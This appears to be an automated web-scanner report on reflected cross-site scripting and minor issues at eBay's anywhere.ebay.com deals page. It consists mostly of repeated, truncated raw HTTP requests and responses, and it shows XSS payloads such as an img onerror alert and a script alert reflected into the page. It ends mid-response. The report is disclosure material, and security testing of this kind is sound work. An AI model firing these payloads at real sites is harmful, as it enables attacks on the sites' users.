1. Cross-site scripting (reflected)
1.1. http://anywhere.ebay.com/apps/deals/ [s parameter]
1.2. http://anywhere.ebay.com/apps/deals/ [s parameter]
2. Cross-domain Referer leakage
3. Cross-domain script include
4. Cookie without HttpOnly flag set
5. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://anywhere.ebay.com |
Path: | /apps/deals/ |
GET /apps/deals/?s=%22%3E Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Length: 11681 X-Cnection: close Content-Type: text/html; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:19 GMT Connection: close Set-Cookie: country=%22%3E%3CiMg+src Set-Cookie: BIGipServeranywhere-u <!DOCTYPE HTML> <html> <head> <meta http-equiv="X-UA <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" /> <script type='text/javascript' src='js/jquery-1.4.2.js'> <script type='text/javascript' src='js/jquery.metadata <script type='text/javascript' src='js/jquery.auto <script type='text/javascript' src='js/autocomplete.js'> <script type="text/javascript" src="js/jquery-1.4.2.min <script type="text/javascript" src="js/javascript <title>eBay Deals</title> <meta name="language" content="english" /> <meta name="description" content="Grab yourself a great deal!" /> <meta name="application-name" content="eBay Homepage" /> <meta name="msapplication <meta name="msapplication <meta name="msapplication-task" content="name=My eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Sell on eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Daily Deals;action-uri=http:/ <meta name="msapplication-task" content="name=Fashion <meta name="msapplication-task" content="name=Visit PayPal;action-uri=http:/ <link rel='stylesheet' type='text/css' href='css/jquery.auto <link rel="stylesheet" type="text/css" href="css/styles_default <link rel="stylesheet" type="text/css" href="css/core.css" /> </head> <body onload="trackFunc();"> <script type="text/javascript" src="js/dailyDeals.js">< <script type="text/javascript"> // share values with the client side isIE9 = 1; country = "><iMg src=N onerror=alert(9)>e08c9 currentPage = 'all'; trackingCode = '711-117568-2056-0'; </script> <div id="pageWrap"> <div class="masthead contain"> <header> <div class="pageWrap"> <a href="http://ebay.com" class="logoLink link logoImg" tabindex="1"><h1>ebay</h1 <nav> <ul> <li class="selected"><a href="?p=all&s="><iMg src=N onerror=alert(9)>e08c9<script>alert(1)< </nav> <div id="searchZone"> <input type="hidden" id="searchUrl" value="http://rover.ebay <input type="text" class="searchField link tab-2" size="60" maxlength="300" value="" id="_nkw" name="_nkw" autocomplete="off" tabindex="2"> <input type="button" id="searchBtn" class="button blue btnSmall link tab-3" value="Search" tabindex="3" onclick="doSearch()" /> </div> </div> </header> </div><!-- }}} header --> <div class="pageWrap"> <section> <div id="dailyDeals" class="floatLeft dailyUs">Daily Deals</div><h2 class="pageTitle">Grab yourself a great deal!</h2> <div class="dealItems contain clear" id="dealCarousel"> <div class="dealItem" draggable="true" ondragstart="DragHandler <section> <div class="mainDealContent contain"> <h3 id="dealInfoTitle" ></h3> <div id="dealInfoImage"></div> <div> <p class="reduction" id="dealInfoSavings"></p> <ul class="buyDetails"> <li class="rrp" id="dealInfoRRP"></li> <li id="dealInfoPrice"></li> </ul> </div> </div> <div class="dealOptions"> <div class="dealOptionsLeft"> <span class="bold small">Postage:</span> <div id="dealInfoFreeShipping" class="orangeText smaller bold">Free shipping</div> </div> <div class="dealOptionsRight"> <span class="bold small">Payments</span> <div id="dealInfoPayPal"><img alt="PayPal Accepted" src="images/payPalLogo </div> </div> <div> <div class="btnFav contain floatLeft marginT5" id="dealInfoAdded"><span class="smallHeart">Saved< <div class="floatRight marginT5"> <div id="dealInfoBuyItNow" class="link" ><a class="button link" href="#" target="_blank">View details</a></div> <div class="rrpLegal marginT5" id="dealInfoLegalText"> </div> <div onclick="addToFavorites </div> </section> </div> <div class="dealsTitle smallHeart"><p><span>+ <div id="dropZone"> <div id="favoriteItems"></div> <div id="itemsToBeDropped" ondrop="DropHandler(this, event);dehighliteDropZone <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> </div> <div id="socialNetworksArea" > <div id="shareThisSquare" class="orange"> <p> <img src="images/share-this-uk <div class="clear floatLeft"><a href="http://twitter.com <div class="clear floatLeft"><a href="http://www.facebook <div class="clear floatLeft"><a href="http://www </div> </div> <div id="subscribeSquare" class="orange"> <p><img src="images/share-this-uk <div> <a id="addSlice" href="javascript:void(0)" class="link" onclick='addToFav();'> </div> <div><a id="pinLink" href="javascript:void(0)" class="link" ><img src="images/pin.gif" alt="pin" /><span>Pin to start menu</span></a></div> </div> </div> </div> </div><!-- }}} dealItems --> </section> <!-- footer --> <footer id="glbfooter"> <!-- language parameter for all countries IE9/Chome App--> <!-- UK footer --> <!-- US footer --> <div id="footerLinks"> <div class="floatLeft"> <ul> <li><a rel="nofollow" class="link" target="_blank" href="http://pages.ebay </ul> </div> <div class="floatRight"> <ul> <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index </ul> </div> </div> <!-- German footer --> <!-- Australian footer --> </footer> <!-- }}} footer --> </div><!-- }}} pageWrap --> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="js/browserExtensions <script type="text/javascript"> //<![CDATA[ jQuery().browserExte targetNode : '#pageWrap', // Inserts alert before this ID browser : 'chrome', backgroundImg : 'images/bkGradient.png', icon : 'images/icon.png', introText : 'Stay connected to eBay anywhere online with the eBay extension for Google Chrome', closeButton : 'images/close.png', installText : 'Install now', installURL : 'https://clients2.google siteLinkText : 'Find out more', siteLinkURL : 'http://anywhere.ebay.com }); //]]> </script> <!-- LV --> <script type="text/javascript" src="http://include <script type="text/javascript"> <!-- function trackFunc() { _rover.setAppId(503); // Page Impression var pageImpEvent = 2040537; var impEvt=_rover.create impEvt.setLVTrk(true); ebayLVTr.setRover(_rover) ebayLVTr.setPageImpEvent ebayLVTrClk._ebayLVT _rover.track(); } //--> </script> <!-- End LV Tag --> <script type="text/javascript" charset="utf-8"> var is_ssl = ("https:" == document.location var asset_host = is_ssl ? "https://s3.amazonaws.com document.write(unescape(" </script> <script type="text/javascript" charset="utf-8"> var feedback_widget_options = {}; feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options var feedback_widget = new GSFN.feedback_widget </script> </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://anywhere.ebay.com |
Path: | /apps/deals/ |
GET /apps/deals/?s=%22%3E Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Length: 11611 X-Cnection: close Content-Type: text/html; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:17 GMT Connection: close Set-Cookie: country=%22%3E%3CiMg+src Set-Cookie: BIGipServeranywhere-u <!DOCTYPE HTML> <html> <head> <meta http-equiv="X-UA <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" /> <script type='text/javascript' src='js/jquery-1.4.2.js'> <script type='text/javascript' src='js/jquery.metadata <script type='text/javascript' src='js/jquery.auto <script type='text/javascript' src='js/autocomplete.js'> <script type="text/javascript" src="js/jquery-1.4.2.min <script type="text/javascript" src="js/javascript <title>eBay Deals</title> <meta name="language" content="english" /> <meta name="description" content="Grab yourself a great deal!" /> <meta name="application-name" content="eBay Homepage" /> <meta name="msapplication <meta name="msapplication <meta name="msapplication-task" content="name=My eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Sell on eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Daily Deals;action-uri=http:/ <meta name="msapplication-task" content="name=Fashion <meta name="msapplication-task" content="name=Visit PayPal;action-uri=http:/ <link rel='stylesheet' type='text/css' href='css/jquery.auto <link rel="stylesheet" type="text/css" href="css/styles_default <link rel="stylesheet" type="text/css" href="css/core.css" /> </head> <body onload="trackFunc();"> <script type="text/javascript" src="js/dailyDeals.js">< <script type="text/javascript"> // share values with the client side isIE9 = 1; country = "><iMg src=N onerror=alert(9)>59565";alert(1)/ currentPage = 'all'; trackingCode = '711-117568-2056-0'; </script> <div id="pageWrap"> <div class="masthead contain"> <header> <div class="pageWrap"> <a href="http://ebay.com" class="logoLink link logoImg" tabindex="1"><h1>ebay</h1 <nav> <ul> <li class="selected"><a href="?p=all&s="><iMg src=N onerror=alert(9)>59565" </nav> <div id="searchZone"> <input type="hidden" id="searchUrl" value="http://rover.ebay <input type="text" class="searchField link tab-2" size="60" maxlength="300" value="" id="_nkw" name="_nkw" autocomplete="off" tabindex="2"> <input type="button" id="searchBtn" class="button blue btnSmall link tab-3" value="Search" tabindex="3" onclick="doSearch()" /> </div> </div> </header> </div><!-- }}} header --> <div class="pageWrap"> <section> <div id="dailyDeals" class="floatLeft dailyUs">Daily Deals</div><h2 class="pageTitle">Grab yourself a great deal!</h2> <div class="dealItems contain clear" id="dealCarousel"> <div class="dealItem" draggable="true" ondragstart="DragHandler <section> <div class="mainDealContent contain"> <h3 id="dealInfoTitle" ></h3> <div id="dealInfoImage"></div> <div> <p class="reduction" id="dealInfoSavings"></p> <ul class="buyDetails"> <li class="rrp" id="dealInfoRRP"></li> <li id="dealInfoPrice"></li> </ul> </div> </div> <div class="dealOptions"> <div class="dealOptionsLeft"> <span class="bold small">Postage:</span> <div id="dealInfoFreeShipping" class="orangeText smaller bold">Free shipping</div> </div> <div class="dealOptionsRight"> <span class="bold small">Payments</span> <div id="dealInfoPayPal"><img alt="PayPal Accepted" src="images/payPalLogo </div> </div> <div> <div class="btnFav contain floatLeft marginT5" id="dealInfoAdded"><span class="smallHeart">Saved< <div class="floatRight marginT5"> <div id="dealInfoBuyItNow" class="link" ><a class="button link" href="#" target="_blank">View details</a></div> <div class="rrpLegal marginT5" id="dealInfoLegalText"> </div> <div onclick="addToFavorites </div> </section> </div> <div class="dealsTitle smallHeart"><p><span>+ <div id="dropZone"> <div id="favoriteItems"></div> <div id="itemsToBeDropped" ondrop="DropHandler(this, event);dehighliteDropZone <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> </div> <div id="socialNetworksArea" > <div id="shareThisSquare" class="orange"> <p> <img src="images/share-this-uk <div class="clear floatLeft"><a href="http://twitter.com <div class="clear floatLeft"><a href="http://www.facebook <div class="clear floatLeft"><a href="http://www </div> </div> <div id="subscribeSquare" class="orange"> <p><img src="images/share-this-uk <div> <a id="addSlice" href="javascript:void(0)" class="link" onclick='addToFav();'> </div> <div><a id="pinLink" href="javascript:void(0)" class="link" ><img src="images/pin.gif" alt="pin" /><span>Pin to start menu</span></a></div> </div> </div> </div> </div><!-- }}} dealItems --> </section> <!-- footer --> <footer id="glbfooter"> <!-- language parameter for all countries IE9/Chome App--> <!-- UK footer --> <!-- US footer --> <div id="footerLinks"> <div class="floatLeft"> <ul> <li><a rel="nofollow" class="link" target="_blank" href="http://pages.ebay </ul> </div> <div class="floatRight"> <ul> <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index </ul> </div> </div> <!-- German footer --> <!-- Australian footer --> </footer> <!-- }}} footer --> </div><!-- }}} pageWrap --> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="js/browserExtensions <script type="text/javascript"> //<![CDATA[ jQuery().browserExte targetNode : '#pageWrap', // Inserts alert before this ID browser : 'chrome', backgroundImg : 'images/bkGradient.png', icon : 'images/icon.png', introText : 'Stay connected to eBay anywhere online with the eBay extension for Google Chrome', closeButton : 'images/close.png', installText : 'Install now', installURL : 'https://clients2.google siteLinkText : 'Find out more', siteLinkURL : 'http://anywhere.ebay.com }); //]]> </script> <!-- LV --> <script type="text/javascript" src="http://include <script type="text/javascript"> <!-- function trackFunc() { _rover.setAppId(503); // Page Impression var pageImpEvent = 2040537; var impEvt=_rover.create impEvt.setLVTrk(true); ebayLVTr.setRover(_rover) ebayLVTr.setPageImpEvent ebayLVTrClk._ebayLVT _rover.track(); } //--> </script> <!-- End LV Tag --> <script type="text/javascript" charset="utf-8"> var is_ssl = ("https:" == document.location var asset_host = is_ssl ? "https://s3.amazonaws.com document.write(unescape(" </script> <script type="text/javascript" charset="utf-8"> var feedback_widget_options = {}; feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options var feedback_widget = new GSFN.feedback_widget </script> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://anywhere.ebay.com |
Path: | /apps/deals/ |
GET /apps/deals/?s=%22%3E Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Length: 11476 X-Cnection: close Content-Type: text/html; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:06 GMT Connection: close Set-Cookie: country=%22%3E%3CiMg+src Set-Cookie: BIGipServeranywhere-u <!DOCTYPE HTML> <html> <head> <meta http-equiv="X-UA <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" /> <script type='text/javascript' src='js/jquery-1.4.2.js'> <script type='text/javascript' src='js/jquery.metadata <script type='text/javascript' src='js/jquery.auto <script type='text/javascript' src='js/autocomplete.js'> <script type="text/javascript" src="js/jquery-1.4.2.min <script type="text/javascript" src="js/javascript <title>eBay Deals</title> <meta name="language" content="english" /> <meta name="description" content="Grab yourself a great deal!" /> <meta name="application-name" content="eBay Homepage" /> <meta name="msapplication <meta name="msapplication <meta name="msapplication-task" content="name=My eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Sell on eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Daily Deals;action-uri=http:/ <meta name="msapplication-task" content="name=Fashion <meta name="msapplication-task" content="name=Visit PayPal;action-uri=http:/ <link rel='stylesheet' type='text/css' href='css/jquery.auto <link rel="stylesheet" type="text/css" href="css/styles_default <link rel="stylesheet" type="text/css" href="css/core.css" /> </head> <body onload="trackFunc();"> <script type="text/javascript" src="js/dailyDeals.js">< <script type="text/javascript"> // share values with the client side isIE9 = 1; country = "><iMg src=N onerror=alert(9)>; currentPage = 'all'; trackingCode = '711-117568-2056-0'; </script> <div id="pageWrap"> <div class="masthead contain"> <header> <div class="pageWrap"> <a href="http://ebay.com" class="logoLink link logoImg" tabindex="1"><h1>ebay</h1 <nav> <ul> <li class="selected"><a href="?p=all&s="><iMg src=N onerror=alert(9)>" class="link" tabindex="4">All Deals</a></li> </ul> </nav> <div id="searchZone"> <input type="hidden" id="searchUrl" value="http://rover.ebay <input type="text" class="searchField link tab-2" size="60" maxlength="300" value="" id="_nkw" name="_nkw" autocomplete="off" tabindex="2"> <input type="button" id="searchBtn" class="button blue btnSmall link tab-3" value="Search" tabindex="3" onclick="doSearch()" /> </div> </div> </header> </div><!-- }}} header --> <div class="pageWrap"> <section> <div id="dailyDeals" class="floatLeft dailyUs">Daily Deals</div><h2 class="pageTitle">Grab yourself a great deal!</h2> <div class="dealItems contain clear" id="dealCarousel"> <div class="dealItem" draggable="true" ondragstart="DragHandler <section> <div class="mainDealContent contain"> <h3 id="dealInfoTitle" ></h3> <div id="dealInfoImage"></div> <div> <p class="reduction" id="dealInfoSavings"></p> <ul class="buyDetails"> <li class="rrp" id="dealInfoRRP"></li> <li id="dealInfoPrice"></li> </ul> </div> </div> <div class="dealOptions"> <div class="dealOptionsLeft"> <span class="bold small">Postage:</span> <div id="dealInfoFreeShipping" class="orangeText smaller bold">Free shipping</div> </div> <div class="dealOptionsRight"> <span class="bold small">Payments</span> <div id="dealInfoPayPal"><img alt="PayPal Accepted" src="images/payPalLogo </div> </div> <div> <div class="btnFav contain floatLeft marginT5" id="dealInfoAdded"><span class="smallHeart">Saved< <div class="floatRight marginT5"> <div id="dealInfoBuyItNow" class="link" ><a class="button link" href="#" target="_blank">View details</a></div> <div class="rrpLegal marginT5" id="dealInfoLegalText"> </div> <div onclick="addToFavorites </div> </section> </div> <div class="dealsTitle smallHeart"><p><span>+ <div id="dropZone"> <div id="favoriteItems"></div> <div id="itemsToBeDropped" ondrop="DropHandler(this, event);dehighliteDropZone <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> </div> <div id="socialNetworksArea" > <div id="shareThisSquare" class="orange"> <p> <img src="images/share-this-uk <div class="clear floatLeft"><a href="http://twitter.com <div class="clear floatLeft"><a href="http://www.facebook <div class="clear floatLeft"><a href="http://www </div> </div> <div id="subscribeSquare" class="orange"> <p><img src="images/share-this-uk <div> <a id="addSlice" href="javascript:void(0)" class="link" onclick='addToFav();'> </div> <div><a id="pinLink" href="javascript:void(0)" class="link" ><img src="images/pin.gif" alt="pin" /><span>Pin to start menu</span></a></div> </div> </div> </div> </div><!-- }}} dealItems --> </section> <!-- footer --> <footer id="glbfooter"> <!-- language parameter for all countries IE9/Chome App--> <!-- UK footer --> <!-- US footer --> <div id="footerLinks"> <div class="floatLeft"> <ul> <li><a rel="nofollow" class="link" target="_blank" href="http://pages.ebay </ul> </div> <div class="floatRight"> <ul> <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index </ul> </div> </div> <!-- German footer --> <!-- Australian footer --> </footer> <!-- }}} footer --> </div><!-- }}} pageWrap --> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="js/browserExtensions <script type="text/javascript"> //<![CDATA[ jQuery().browserExte targetNode : '#pageWrap', // Inserts alert before this ID browser : 'chrome', backgroundImg : 'images/bkGradient.png', icon : 'images/icon.png', introText : 'Stay connected to eBay anywhere online with the eBay extension for Google Chrome', closeButton : 'images/close.png', installText : 'Install now', installURL : 'https://clients2.google siteLinkText : 'Find out more', siteLinkURL : 'http://anywhere.ebay.com }); //]]> </script> <!-- LV --> <script type="text/javascript" src="http://include <script type="text/javascript"> <!-- function trackFunc() { _rover.setAppId(503); // Page Impression var pageImpEvent = 2040537; var impEvt=_rover.create impEvt.setLVTrk(true); ebayLVTr.setRover(_rover) ebayLVTr.setPageImpEvent ebayLVTrClk._ebayLVT _rover.track(); } //--> </script> <!-- End LV Tag --> <script type="text/javascript" charset="utf-8"> var is_ssl = ("https:" == document.location var asset_host = is_ssl ? "https://s3.amazonaws.com document.write(unescape(" </script> <script type="text/javascript" charset="utf-8"> var feedback_widget_options = {}; feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options var feedback_widget = new GSFN.feedback_widget </script> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://anywhere.ebay.com |
Path: | /apps/deals/ |
GET /apps/deals/?s=%22%3E Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Length: 11476 X-Cnection: close Content-Type: text/html; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:06 GMT Connection: close Set-Cookie: country=%22%3E%3CiMg+src Set-Cookie: BIGipServeranywhere-u <!DOCTYPE HTML> <html> <head> <meta http-equiv="X-UA <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" /> <script type='text/javascript' src='js/jquery-1.4.2.js'> <script type='text/javascript' src='js/jquery.metadata <script type='text/javascript' src='js/jquery.auto <script type='text/javascript' src='js/autocomplete.js'> <script type="text/javascript" src="js/jquery-1.4.2.min <script type="text/javascript" src="js/javascript <title>eBay Deals</title> <meta name="language" content="english" /> <meta name="description" content="Grab yourself a great deal!" /> <meta name="application-name" content="eBay Homepage" /> <meta name="msapplication <meta name="msapplication <meta name="msapplication-task" content="name=My eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Sell on eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Daily Deals;action-uri=http:/ <meta name="msapplication-task" content="name=Fashion <meta name="msapplication-task" content="name=Visit PayPal;action-uri=http:/ <link rel='stylesheet' type='text/css' href='css/jquery.auto <link rel="stylesheet" type="text/css" href="css/styles_default <link rel="stylesheet" type="text/css" href="css/core.css" /> </head> <body onload="trackFunc();"> <script type="text/javascript" src="js/dailyDeals.js">< <script type="text/javascript"> // share values with the client side isIE9 = 1; country = "><iMg src=N onerror=alert(9)>; currentPage = 'all'; trackingCode = '711-117568-2056-0'; </script> <div id="pageWrap"> <div class="masthead contain"> <header> <div class="pageWrap"> <a href="http://ebay.com" class="logoLink link logoImg" tabindex="1"><h1>ebay</h1 <nav> <ul> <li class="selected"><a href="?p=all&s="><iMg src=N onerror=alert(9)>" class="link" tabindex="4">All Deals</a></li> </ul> </nav> <div id="searchZone"> <input type="hidden" id="searchUrl" value="http://rover.ebay <input type="text" class="searchField link tab-2" size="60" maxlength="300" value="" id="_nkw" name="_nkw" autocomplete="off" tabindex="2"> <input type="button" id="searchBtn" class="button blue btnSmall link tab-3" value="Search" tabindex="3" onclick="doSearch()" /> </div> </div> </header> </div><!-- }}} header --> <div class="pageWrap"> <section> <div id="dailyDeals" class="floatLeft dailyUs">Daily Deals</div><h2 class="pageTitle">Grab yourself a great deal!</h2> <div class="dealItems contain clear" id="dealCarousel"> <div class="dealItem" draggable="true" ondragstart="DragHandler <section> <div class="mainDealContent contain"> <h3 id="dealInfoTitle" ></h3> <div id="dealInfoImage"></div> <div> <p class="reduction" id="dealInfoSavings"></p> <ul class="buyDetails"> <li class="rrp" id="dealInfoRRP"></li> <li id="dealInfoPrice"></li> </ul> </div> </div> <div class="dealOptions"> <div class="dealOptionsLeft"> <span class="bold small">Postage:</span> <div id="dealInfoFreeShipping" class="orangeText smaller bold">Free shipping</div> </div> <div class="dealOptionsRight"> <span class="bold small">Payments</span> <div id="dealInfoPayPal"><img alt="PayPal Accepted" src="images/payPalLogo </div> </div> <div> <div class="btnFav contain floatLeft marginT5" id="dealInfoAdded"><span class="smallHeart">Saved< <div class="floatRight marginT5"> <div id="dealInfoBuyItNow" class="link" ><a class="button link" href="#" target="_blank">View details</a></div> <div class="rrpLegal marginT5" id="dealInfoLegalText"> </div> <div onclick="addToFavorites </div> </section> </div> <div class="dealsTitle smallHeart"><p><span>+ <div id="dropZone"> <div id="favoriteItems"></div> <div id="itemsToBeDropped" ondrop="DropHandler(this, event);dehighliteDropZone <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> </div> <div id="socialNetworksArea" > <div id="shareThisSquare" class="orange"> <p> <img src="images/share-this-uk <div class="clear floatLeft"><a href="http://twitter.com <div class="clear floatLeft"><a href="http://www.facebook <div class="clear floatLeft"><a href="http://www </div> </div> <div id="subscribeSquare" class="orange"> <p><img src="images/share-this-uk <div> <a id="addSlice" href="javascript:void(0)" class="link" onclick='addToFav();'> </div> <div><a id="pinLink" href="javascript:void(0)" class="link" ><img src="images/pin.gif" alt="pin" /><span>Pin to start menu</span></a></div> </div> </div> </div> </div><!-- }}} dealItems --> </section> <!-- footer --> <footer id="glbfooter"> <!-- language parameter for all countries IE9/Chome App--> <!-- UK footer --> <!-- US footer --> <div id="footerLinks"> <div class="floatLeft"> <ul> <li><a rel="nofollow" class="link" target="_blank" href="http://pages.ebay </ul> </div> <div class="floatRight"> <ul> <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index </ul> </div> </div> <!-- German footer --> <!-- Australian footer --> </footer> <!-- }}} footer --> </div><!-- }}} pageWrap --> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="js/browserExtensions <script type="text/javascript"> //<![CDATA[ jQuery().browserExte targetNode : '#pageWrap', // Inserts alert before this ID browser : 'chrome', backgroundImg : 'images/bkGradient.png', icon : 'images/icon.png', introText : 'Stay connected to eBay anywhere online with the eBay extension for Google Chrome', closeButton : 'images/close.png', installText : 'Install now', installURL : 'https://clients2.google siteLinkText : 'Find out more', siteLinkURL : 'http://anywhere.ebay.com }); //]]> </script> <!-- LV --> <script type="text/javascript" src="http://include <script type="text/javascript"> <!-- function trackFunc() { _rover.setAppId(503); // Page Impression var pageImpEvent = 2040537; var impEvt=_rover.create impEvt.setLVTrk(true); ebayLVTr.setRover(_rover) ebayLVTr.setPageImpEvent ebayLVTrClk._ebayLVT _rover.track(); } //--> </script> <!-- End LV Tag --> <script type="text/javascript" charset="utf-8"> var is_ssl = ("https:" == document.location var asset_host = is_ssl ? "https://s3.amazonaws.com document.write(unescape(" </script> <script type="text/javascript" charset="utf-8"> var feedback_widget_options = {}; feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options var feedback_widget = new GSFN.feedback_widget </script> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://anywhere.ebay.com |
Path: | /apps/deals/ |
GET /apps/deals/?s=%22%3E Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Length: 11476 X-Cnection: close Content-Type: text/html; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:06 GMT Connection: close Set-Cookie: country=%22%3E%3CiMg+src Set-Cookie: BIGipServeranywhere-u <!DOCTYPE HTML> <html> <head> <meta http-equiv="X-UA <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" /> <script type='text/javascript' src='js/jquery-1.4.2.js'> <script type='text/javascript' src='js/jquery.metadata <script type='text/javascript' src='js/jquery.auto <script type='text/javascript' src='js/autocomplete.js'> <script type="text/javascript" src="js/jquery-1.4.2.min <script type="text/javascript" src="js/javascript <title>eBay Deals</title> <meta name="language" content="english" /> <meta name="description" content="Grab yourself a great deal!" /> <meta name="application-name" content="eBay Homepage" /> <meta name="msapplication <meta name="msapplication <meta name="msapplication-task" content="name=My eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Sell on eBay;action-uri=http:/ <meta name="msapplication-task" content="name=Daily Deals;action-uri=http:/ <meta name="msapplication-task" content="name=Fashion <meta name="msapplication-task" content="name=Visit PayPal;action-uri=http:/ <link rel='stylesheet' type='text/css' href='css/jquery.auto <link rel="stylesheet" type="text/css" href="css/styles_default <link rel="stylesheet" type="text/css" href="css/core.css" /> </head> <body onload="trackFunc();"> <script type="text/javascript" src="js/dailyDeals.js">< <script type="text/javascript"> // share values with the client side 